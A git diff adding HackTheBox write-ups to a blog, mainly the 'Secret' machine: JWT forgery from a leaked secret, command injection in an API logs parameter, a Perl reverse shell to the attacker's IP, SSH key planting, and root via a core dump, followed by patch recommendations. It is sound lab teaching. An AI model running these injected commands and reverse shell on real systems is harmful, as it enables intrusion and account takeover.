+|         o o.= .o|
+|          oo  +.+|
+|           .o=+BE|
+|            +=#&X|
++----[SHA256]-----+                  
+```
+Then I add my public key in the "authorized\_jeys" file with the following command:
+
+
+```bash
+"ip":";echo 'ssh-rsa [public_key] kali@kali'>> ~/.ssh/authorized_keys"
+```
+I can now connect in SSH and get the first flag.
+
+![](img/image-6.webp)
+
+## Privilege escalation
+
+To start I'll use [linPeas](https://linpeas.sh/) to do a first exploit tracking on the machine. But I have indeed the impression that IPtables rules are blocking my requests:
+
+![](img/image-7.webp)
+
+To transfer my file I will use "scp" with the following command:
+
+
+```bash
+┌──(kali㉿kali)-[~]
+└─$ scp linpeas.sh paul@10.10.11.148:~/ 
+linpeas.sh                              100%  748KB   8.4MB/s   00:00
+```
+After running the script, I notice that the machine uses a version of sudo that is exploitable (CVE-2021-3156). After some research I find this script which allows to create a root shell:
+
+[GitHub - mohinparamasivam/Sudo-1.8.31-Root-Exploit: Root shell PoC for CVE-2021-3156Root shell PoC for CVE-2021-3156. Contribute to mohinparamasivam/Sudo-1.8.31-Root-Exploit development by creating an account on GitHub.![](https://github.com/fluidicon.png)
+
+{{< github repo="mohinparamasivam/Sudo-1.8.31-Root-Exploit" >}}
+
+And indeed after executing the code, I get a root shell and I can recover the last flag!
+
+![](img/image-8.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Secure the application to avoid code injection
+- Run the service with a user who does not have SSH access
+- Update the sudo version to a more secure one
diff --git a/content/writeup-ctf/writeup-secret-htb/featured.png b/content/writeup-ctf/writeup-secret-htb/featured.png
new file mode 100644
index 0000000..590df71
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:999eddadf8957078c856528e1418e1b4b61adb4b3cf1d42af4371297f9218838
+size 260739
diff --git a/content/writeup-ctf/writeup-secret-htb/featured.webp b/content/writeup-ctf/writeup-secret-htb/featured.webp
new file mode 100644
index 0000000..8744360
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1da839f06f75dff39cc0af1a401c6f2d64dd42a879c272aa59fb307164aff01d
+size 25298
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-1.png b/content/writeup-ctf/writeup-secret-htb/img/image-1.png
new file mode 100644
index 0000000..34cc89e
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4c804133308ad229333445030cb84b8d6931bf69e64daace8ad6885ad0c419c4
+size 56700
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-1.webp b/content/writeup-ctf/writeup-secret-htb/img/image-1.webp
new file mode 100644
index 0000000..5797b13
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ea45ff2eca301e6a9c5e4016b1e2751623196b55c14badfebea31dc6461a84c2
+size 47746
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-10.png b/content/writeup-ctf/writeup-secret-htb/img/image-10.png
new file mode 100644
index 0000000..7831efe
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c66741ac71b1471909e2a87a247c0988f25e18a8be20b4a8aebaef783e222994
+size 48565
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-10.webp b/content/writeup-ctf/writeup-secret-htb/img/image-10.webp
new file mode 100644
index 0000000..25116ca
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:124e6754b4192d217eb7320d4d73d09d621cf7bdd0de6b1cd239bf4f34421b5f
+size 32370
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-11.png b/content/writeup-ctf/writeup-secret-htb/img/image-11.png
new file mode 100644
index 0000000..5e4fd05
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:184043d432e82c103a8f236ed8635ea63523637d76d7e72208ae29531d0b3621
+size 23449
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-11.webp b/content/writeup-ctf/writeup-secret-htb/img/image-11.webp
new file mode 100644
index 0000000..adbe89a
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5e07f644154184ca9ef2ca9c192fb3798189dbf7f5828b6838963e7945c4dc86
+size 20576
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-12.png b/content/writeup-ctf/writeup-secret-htb/img/image-12.png
new file mode 100644
index 0000000..7e6e4d6
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:82d3de6689942f876b8dff4a07bad0200b92d70e4ca6087a177d82a5433c154e
+size 26107
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-12.webp b/content/writeup-ctf/writeup-secret-htb/img/image-12.webp
new file mode 100644
index 0000000..dd0a4c3
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cebbaec44698bd9bb0d95dc2e5c4de9e095b6fe129a50bd0381ffff0e4c10711
+size 21560
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-13.png b/content/writeup-ctf/writeup-secret-htb/img/image-13.png
new file mode 100644
index 0000000..f45d584
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ad02150cb49ed0aeff704d9cd64a502486d6680d59d47cbe8eaaa7a13efa0a58
+size 24842
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-13.webp b/content/writeup-ctf/writeup-secret-htb/img/image-13.webp
new file mode 100644
index 0000000..6152394
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:08e3d2687ba475f8e0f12dcf50e2f708a33613081a8a515cfb1efd6ad5afe096
+size 20038
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-14.png b/content/writeup-ctf/writeup-secret-htb/img/image-14.png
new file mode 100644
index 0000000..5e9854e
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:65e5556b139b352bfe7309b02159a955770effebb1adc0be7e6296529a812023
+size 46471
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-14.webp b/content/writeup-ctf/writeup-secret-htb/img/image-14.webp
new file mode 100644
index 0000000..2e8764f
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:73c7a6535acdd46e8970ff4834d717077d68225ca0b9214a95798bfb06de2119
+size 35754
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-15.png b/content/writeup-ctf/writeup-secret-htb/img/image-15.png
new file mode 100644
index 0000000..d85e7f9
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-15.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6a9f097c2a9174a6f75582d11f9bdaa378a8fa7ddf3c19119efea682af484add
+size 57864
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-15.webp b/content/writeup-ctf/writeup-secret-htb/img/image-15.webp
new file mode 100644
index 0000000..5e727de
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-15.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e213ec4faba2790b72031ed896ecd7d048e21712a500b5aa7722275720f8fbfd
+size 60240
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-2.png b/content/writeup-ctf/writeup-secret-htb/img/image-2.png
new file mode 100644
index 0000000..9d6af2f
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bbc876ee83e7952cefe17fec1db6e74ddecc36192aefcae12874099ae4c41e15
+size 193060
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-2.webp b/content/writeup-ctf/writeup-secret-htb/img/image-2.webp
new file mode 100644
index 0000000..808cb95
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d14a0a1d66a61ea1faa19c28f2fd505c2d2b6b5645649d7aecd17471c55a2c46
+size 90636
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-3.png b/content/writeup-ctf/writeup-secret-htb/img/image-3.png
new file mode 100644
index 0000000..b270b06
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4ecb659f888d7f04405b99d879d2129eb0823b6e24869a9d21ffad89fbc4f4ff
+size 44195
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-3.webp b/content/writeup-ctf/writeup-secret-htb/img/image-3.webp
new file mode 100644
index 0000000..c60181b
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fb3a5cf87f96fdcd5970efeb89b4143f5015d4b6667ad8faf78356a903ab4daf
+size 29508
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-4.png b/content/writeup-ctf/writeup-secret-htb/img/image-4.png
new file mode 100644
index 0000000..441421a
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:64d1cb86055a36c36d8173704896f0c10b0dfd4130a02ac0f875df9e4cd487da
+size 57936
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-4.webp b/content/writeup-ctf/writeup-secret-htb/img/image-4.webp
new file mode 100644
index 0000000..111fb8e
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:41e73ca1bac685d2e7a1426ef7182b8bb0f193479d21b92c2abcd70c41672418
+size 42246
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-5.png b/content/writeup-ctf/writeup-secret-htb/img/image-5.png
new file mode 100644
index 0000000..65c042e
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8147764dae8cbdb8f02ab7fbaeaa923f1a1a4b403c701840220e7278251c9eb1
+size 45985
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-5.webp b/content/writeup-ctf/writeup-secret-htb/img/image-5.webp
new file mode 100644
index 0000000..3c4c904
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b3104e530458bcd3466f7efdbdee2c9f24b1bb4ba23e61450c4e32158c13d0ed
+size 31148
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-6.png b/content/writeup-ctf/writeup-secret-htb/img/image-6.png
new file mode 100644
index 0000000..a37b34b
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:48066aaee4ada4758c03cfa174d140749dca25878b56c3a767b09ea339dcfcfb
+size 13641
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-6.webp b/content/writeup-ctf/writeup-secret-htb/img/image-6.webp
new file mode 100644
index 0000000..e89c4d7
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6cd5613cff5bd8bd0983182fb71e4da99cf52659c690ccab64e47b4e73da621f
+size 8850
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-7.png b/content/writeup-ctf/writeup-secret-htb/img/image-7.png
new file mode 100644
index 0000000..eb0b5a4
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0fc620150366ac3db6f506a74ffd012a915c5ab00d7d619f9e6bfebc67680a52
+size 44229
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-7.webp b/content/writeup-ctf/writeup-secret-htb/img/image-7.webp
new file mode 100644
index 0000000..f356ac4
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:834c620884f50558f52028020481739f86745fca9ab835db5d6d2c3ad6b3e89a
+size 30614
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-8.png b/content/writeup-ctf/writeup-secret-htb/img/image-8.png
new file mode 100644
index 0000000..7d9d80e
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:514011beda714c604b573cdf23003e9abe8e4112e372991787624aa4d83de976
+size 70811
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-8.webp b/content/writeup-ctf/writeup-secret-htb/img/image-8.webp
new file mode 100644
index 0000000..75832a8
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bc7eab2fa7e11e7b2b69d1910f2140b51ba271f0110a7ffd86f102762df3862b
+size 63426
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-9.png b/content/writeup-ctf/writeup-secret-htb/img/image-9.png
new file mode 100644
index 0000000..6ac5d57
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7cabb82a9e17dabc60e83d1ec4f859943a60525759cebed60fc92cc9d7f4d74
+size 106604
diff --git a/content/writeup-ctf/writeup-secret-htb/img/image-9.webp b/content/writeup-ctf/writeup-secret-htb/img/image-9.webp
new file mode 100644
index 0000000..3a3d42a
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e8858c4d144af986fbed989e7a581b1ff9da572689b637a78544635ce2e2c3af
+size 85408
diff --git a/content/writeup-ctf/writeup-secret-htb/index.md b/content/writeup-ctf/writeup-secret-htb/index.md
new file mode 100644
index 0000000..3cb7c92
--- /dev/null
+++ b/content/writeup-ctf/writeup-secret-htb/index.md
@@ -0,0 +1,183 @@
+---
+title: "Writeup - Secret (HTB)"
+date: 2022-04-04
+slug: "writeup-secret-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Secret](https://app.hackthebox.com/machines/Secret) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.120
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : web server (Nginx 1.18.0)
+- 3000/tcp : Node.js
+
+We have a site on port 80 and Node.js on port 3000: potentially an API. Let's go see with a browser what the site looks like and if we can find any information.
+
+![](img/image-2.webp)
+
+We can see several things: already there is an API with documentation, so potentially an attack vector. But we also have the source code of the site/API, which could be used to find vulnerabilities.
+
+## Exploit
+
+First, I will try to understand how the API works with the documentation. With the help of [Postman](https://www.postman.com/) software, I will create POST/GET requests to interact with the API. Let's create an account:
+
+![](img/image-3.webp)
+
+the API returns our user name which is normal, now let's try to connect to get our TOKEN and see how it is constituted:
+
+![](img/image-4.webp)
+
+The TOKEN is of type JWT, it is a token in 3 parts encoded in Base64 :
+
+
+```bash
+eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 :
+{"alg":"HS256","typ":"JWT"}
+
+eyJfaWQiOiI2MjBlY2Y2Y2FiMjEyYzA0NjE1YjdmZDYiLCJuYW1lIjoiYXplcnR5IiwiZW1haWwiOiJhemVydHlAYXplcnR5LmNvbSIsImlhdCI6MTY0NTEzNzg2N30 :
+{"_id":"620ecf6cab212c04615b7fd6","name":"azerty","email":"azerty@azerty.com","iat":1645137867}
+
+
+oiM2eElnf05YPc9BSq9PiP8S8KCJh7lvhjo1x-sapIM
+```
+Now let's try to access the priv page, to do this we need to send a request with a headers "auth-token" which has as value our TOKEN.
+
+![](img/image-5.webp)
+
+The API returns that we are a normal user. In the documentation we notice that the admin nickname is "theadmin", which is confirmed in the source code. The user with this nickname will have admin access.
+
+![](img/image-6.webp)
+
+The problem is that the account already exists and therefore the nickname is not available when creating a new account.
+
+![](img/image-7.webp)
+
+So we will have to find a way to send a request with the admin TOKEN to have access to the priv page and then send commands to the server. I have read about the json web token exploit on the following page:
+
+[Hacking JSON Web Tokens (JWTs)](https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a)
+
+I found out that if we have the admin TOKEN (which we have thanks to the documentation) and we have the TOKEN_SECRET which is used by the server. We can deduce the TOKEN without needing to know the admin password, perfect!
+
+After some analysis of the source code I discover that there are two hidden files: "*.git*" and "*.env*". And if I look in the "*.env*" file, I find the following content :
+
+
+```bash
+DB_CONNECT = 'mongodb://127.0.0.1:27017/auth-web'
+TOKEN_SECRET = secret
+```
+Bingo, the TOKEN_SECRET is in the file, it only remains to decrypt the tocken admin with this secret on the site [JWT](https://jwt.io/) :
+
+![](img/image-8.webp)
+
+And we get the admin TOKEN, unfortunately after sending the request, the TOKEN is not recognized, there must be another TOKEN_SECRET somewhere.
+
+I quickly realize that there are two commits on the .env file, in the first commit there is another TOKEN :
+
+![](img/image-9.webp)
+
+
+```bash
+eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2MTE0NjU0ZDc3ZjlhNTRlMDBmMDU3NzciLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6InJvb3RAZGFzaXRoLndvcmtzIiwiaWF0IjoxNjI4NzI3NjY5fQ.52W5mGLsIO2iiLpy3f1VkVavP4hOoWHxy5_0BDn9UKo
+```
+I test this new TOKEN and make a request:
+
+![](img/image-10.webp)
+
+It works, I now have admin access to the API. Now let's analyze the logs page to find a exploit.
+
+![](img/image-11.webp)
+
+I realize that the page check if I am admin, then run the command "git". So if in the variable "file" I add a command after a filename, I can execute any command, for example :
+
+
+```bash
+GET http://10.10.11.120/api/logs?file=;ls /home
+"80bf34c fixed typos 🎉\n0c75212 now we can view logs from server 😃\nab3e953 Added the codes\ndasith\n"
+```
+After the return of the log command, the result of the "ls /home" command is here : dasith.
+
+Now I will try to create a reverse shell to do the privilege elevation. After opening the 1234 on my machine with the "nc" command, I use the following request to initiate the connection:
+
+
+```bash
+http://10.10.11.120/api/logs?file=;perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.246:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
+```
+I do a shell upgrade with the following command:
+
+
+```bash
+python3  -c 'import pty;pty.spawn("/bin/bash")'
+```
+I now have a clean shell with the user dasith !
+
+![](img/image-12.webp)
+
+Then I can get the first flag !
+
+
+```bash
+dasith@secret:~/local-web$ cat /home/dasith/user.txt
+d2afcc21f60e10127abdf051998281af
+```
+## Privilege escalation
+
+At first I use the [linPeas](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script, but without much success. After testing several exploits (CVE-2021-4034, Reusing Sudo Tokens, Credentials from Process Memory, ...), I resign myself to go look somewhere else. I notice that in the "/opt" folder, there is a program that I can run with root rights : "count".
+
+![](img/image-13.webp)
+
+After running it to understand how it works, I understand that the program takes a file as input and gives in return the number of characters, words, lines. It is globally equivalent to the "wc" command, but it offers the possibility to save the result in a file. After having done an analysis of the code with "gdb" without much success, I put myself in search of a solution to recover the data that program use during its execution.
+
+I notice that there is a second file: code.c. Potentially the source code of "count". In this file nothing special except the following line:
+
+
+```bash
+// Enable coredump generation
+prctl(PR_SET_DUMPABLE, 1);
+```
+After some research, this command activates the generation of log following a core dump. This log contains among other things the contents of the memory during the crash, it would be possible to recover the contents of the file being read by the program. So let's try to make a core dump during the execution of the program and analyze the logs !
+
+![](img/image-14.webp)
+
+So I launch the program, then pause it with "CTRL+Z". I then look for the process number and generate a crash with "kill -BUS". Then i resume the execution with "fg", the program makes a Core Dump. Normally a log has been generated in "/var/log", I extract the log with "apport-unpack". And then I extract words with the command "strings":
+
+
+```bash
+apport-unpack /var/crash/_opt_count.1000.crash /tmp/log
+strings /tmp/log/CoreDump
+```
+![](img/image-15.webp)
+
+I find in the output of the command the private key of the root account ! I now can use it to connect with ssh and get the root flag of the machine:
+
+
+```bash
+chmod 600 id.root
+ssh -i id.root root@10.10.11.120
+```
+
+```bash
+root@secret:~# cat root.txt 
+f1fd65e03617bbf10967424cffe1cc3c
+```
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Don't include real TOKEN in the documentation
+- Take care of removing every secret or sensitive information in the source code before publish it
+- Do not hard code the API admin name
+- Secure the API to prevent commands from being executed on the host
+- Disable logs following a core dump or at least do not allow access to a non-root user
+- Do not leave the source code of a program accessible to everyone
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/featured.png b/content/writeup-ctf/writeup-shibboleth-htb/featured.png
new file mode 100644
index 0000000..6858013
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3fa622492a98f56a836ce8136b95ee3b3ee8563613f509672439741166204eb9
+size 234376
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/featured.webp b/content/writeup-ctf/writeup-shibboleth-htb/featured.webp
new file mode 100644
index 0000000..562e584
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c7a333ae3251f006a7102f73111e867cf6fb8a452a35fb93a8e9991635449070
+size 27828
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png
new file mode 100644
index 0000000..0f711b0
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2bd442bc5f2da8683669a9d26ebd151534bbb56ab0937f53c59ebc711ca861ad
+size 36322
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp
new file mode 100644
index 0000000..cc3058d
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:51453c097ddb3b25c0ca04f6506544954220f74abe02a24adb36600f62e461d1
+size 28096
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png
new file mode 100644
index 0000000..d9b6bdb
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8abcecd00908e7b8983541f814e9acbbab6cd98d28605f25f16bddd13d0e2ed2
+size 13561
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp
new file mode 100644
index 0000000..b7db597
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:142a98029246ac8f7946da3894aaca93bd62bcf280d43977392f7982cf570525
+size 12920
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png
new file mode 100644
index 0000000..855f685
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bcc49e6cb4eecf23ba7b3ebee7762c443f49ef43e0ce3c3468af4b529628c885
+size 28447
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp
new file mode 100644
index 0000000..07ece0b
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:acd9859ba97cb2e039fb9328e0d61688385dde789d519db5753a2f768780b360
+size 31776
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png
new file mode 100644
index 0000000..3d0d93b
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ce6d23cc8da70d08761a35b1fdf07ccb83a47727c15db3851ff48405d1f8f9f3
+size 22730
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp
new file mode 100644
index 0000000..616f556
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:295f616c443c059dbb9061247006000de32a1cddf2de30a781ad730e5851d7d8
+size 25324
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png
new file mode 100644
index 0000000..615433c
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:32ca7d3a7fec5a6e54bc89c4998a397421f05db6fdefd3b6d21cbfa3bc35a148
+size 16149
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp
new file mode 100644
index 0000000..0414583
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:76f23a6fcb302611b2170e7a7ff5a3495c37a00bc0457ec75e3585bc287ac367
+size 16206
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png
new file mode 100644
index 0000000..128121a
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:faa0d7e8839334047a52dd917e370fae3dcd49b88b5df91ba086378d85c3c42f
+size 185834
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp
new file mode 100644
index 0000000..33cd622
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:dce79195933309b326a5127171374f7fcfaa8dedba4d02c2993af335098e4511
+size 65634
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png
new file mode 100644
index 0000000..fc1baa5
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:da6ed97767feafd78ac9b861220002e09693c8e266387d18b474b9603ba5b9e5
+size 74079
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp
new file mode 100644
index 0000000..0f86a4e
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:62ecb722567809fbc6d456db565c41f8df892092661480d1d788c5361b35c927
+size 50800
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png
new file mode 100644
index 0000000..0ea654f
--- /dev/null
+++ b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1910db54678d77340c5f6b58f055eab2835555c774dabda281be6f3e5430dfdd
+size 64366
diff --git a/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp b/content/writeup-ctf/writeup-shibboleth-htb/img/image-4.webp
new file mode 100644
